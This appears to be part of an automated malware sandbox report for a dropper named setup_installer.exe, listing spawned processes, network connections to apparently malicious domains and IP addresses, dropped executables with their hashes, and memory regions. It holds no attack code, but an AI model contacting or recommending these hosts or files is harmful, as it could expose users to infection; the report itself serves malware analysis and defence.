"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5260,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5416,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5196 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5572,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5588 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4600 -ip 4600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1204

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3744,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3892 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3516,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3972,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3512 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3444,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3900 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3892,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3468 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=2008,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3980 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=3912,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3448 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=1928,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1992 /prefetch:2

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4600 -ip 4600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1552

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 107.178.223.183:80 telegka.top tcp
FI 135.181.129.119:4805 tcp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 06c46fe375c6748c533c881346b684d1
SHA1 cb488c5b5f58f3adaf360b0721e145f59c110b57
SHA256 07cf30eb7de3a5626ce499d5efdeba147c3c5bd40686cfc8727b4da7f9ab7d1a
SHA512 bdf582b78bc5ef135260f7c93119ef315cc08836d9864014951bc6fe919e33ca3184828c70e6ab43b70730bd191a511112a088968abf03bbe4a5e17cb4276443

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe

MD5 ba794724c566766d57e2aee175cde54a
SHA1 401fb41eaf42791c66738f460009ba00f7cdd913
SHA256 9a6c446576e8005dae5b5fb4df7876dea6f09501156e9a5220b60d77b41566d6
SHA512 590777c06b912054ef8722c8195521e1c74bf3f31f7c3b8e9e2b7a14352f25ed0ada8e6751916017bd506af03eb0afea0ca759872a8ff17d5837836fdaf6e774

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1460-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-86-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1460-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1460-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1460-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1124-87-0x0000000004A30000-0x0000000004A66000-memory.dmp

memory/1460-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4504-88-0x0000000004D40000-0x0000000005368000-memory.dmp

memory/1460-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1460-79-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-78-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-76-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1460-75-0x0000000064941000-0x000000006494F000-memory.dmp

memory/1460-74-0x0000000000EB0000-0x0000000000F3F000-memory.dmp

memory/1460-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1460-72-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue192762f1cd058ddf8.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/1124-135-0x0000000005AD0000-0x0000000005E24000-memory.dmp

memory/4684-148-0x0000000000AB0000-0x0000000000B20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/3840-156-0x00000000008C0000-0x00000000008C6000-memory.dmp

memory/3840-153-0x0000000000130000-0x0000000000148000-memory.dmp

memory/3956-149-0x00000000005E0000-0x00000000005E8000-memory.dmp

memory/1768-147-0x0000000005380000-0x000000000539E000-memory.dmp

memory/2040-140-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1768-145-0x0000000005400000-0x0000000005476000-memory.dmp

memory/1768-144-0x0000000000C10000-0x0000000000C82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogspjjud.lh5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4504-113-0x00000000053E0000-0x0000000005446000-memory.dmp

memory/4504-112-0x0000000005370000-0x00000000053D6000-memory.dmp

memory/4504-110-0x0000000004CA0000-0x0000000004CC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-ETQOM.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/1144-157-0x0000000000090000-0x0000000000100000-memory.dmp

memory/1768-167-0x0000000005C30000-0x00000000061D4000-memory.dmp

memory/2820-174-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2040-176-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1124-177-0x0000000004D10000-0x0000000004D2E000-memory.dmp

memory/2092-172-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1124-180-0x0000000006050000-0x000000000609C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OTIBH.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1460-199-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1460-200-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1460-198-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1460-197-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1460-195-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1460-191-0x0000000000400000-0x000000000051C000-memory.dmp

memory/4756-207-0x0000000005980000-0x0000000005F98000-memory.dmp

memory/4756-209-0x0000000005560000-0x000000000566A000-memory.dmp

memory/4756-208-0x00000000053F0000-0x0000000005402000-memory.dmp

memory/4756-205-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4756-210-0x00000000054D0000-0x000000000550C000-memory.dmp

memory/1124-215-0x0000000006F70000-0x0000000006FA2000-memory.dmp

memory/1124-226-0x0000000006570000-0x000000000658E000-memory.dmp

memory/1124-216-0x000000006CFE0000-0x000000006D02C000-memory.dmp

memory/1124-227-0x0000000006FB0000-0x0000000007053000-memory.dmp

memory/4504-228-0x000000006CFE0000-0x000000006D02C000-memory.dmp

memory/1124-238-0x0000000007990000-0x000000000800A000-memory.dmp

memory/1124-239-0x00000000070D0000-0x00000000070EA000-memory.dmp

memory/1124-240-0x0000000007360000-0x000000000736A000-memory.dmp

memory/1124-241-0x0000000007550000-0x00000000075E6000-memory.dmp

memory/1124-245-0x00000000074E0000-0x00000000074F1000-memory.dmp

memory/3332-242-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/852-247-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue19761b3b8d9d.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/2324-259-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4504-256-0x0000000006FD0000-0x0000000006FDE000-memory.dmp

memory/4504-260-0x0000000006FE0000-0x0000000006FF4000-memory.dmp

memory/4504-261-0x00000000070D0000-0x00000000070EA000-memory.dmp

memory/4504-272-0x00000000070C0000-0x00000000070C8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2865daf321b26ca00970bb539720d61f
SHA1 875194d6dbd5b40f3c406a13bd997d5ab6e8b721
SHA256 b2323989341a0892f7e0eab89ebe55b43170387276eea78c54666e19d48314b4
SHA512 f3bad9cc02782540f76a339d2d709532c314d1bf640d2c2bc5d7b84f650cf894e79e6e20189f0efc74319a9af6d93167b92d7655ba7be0b7a253c0a08cc89503

C:\Users\Admin\AppData\Local\Temp\F3U_R.J

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/528-281-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/3956-282-0x000000001B1B0000-0x000000001B2B2000-memory.dmp

memory/4628-283-0x0000000000400000-0x0000000002F29000-memory.dmp

memory/3340-297-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2092-296-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4600-309-0x0000000002F20000-0x0000000002FC5000-memory.dmp

memory/4600-315-0x0000000002FE0000-0x0000000003072000-memory.dmp

memory/4600-312-0x0000000002FE0000-0x0000000003072000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
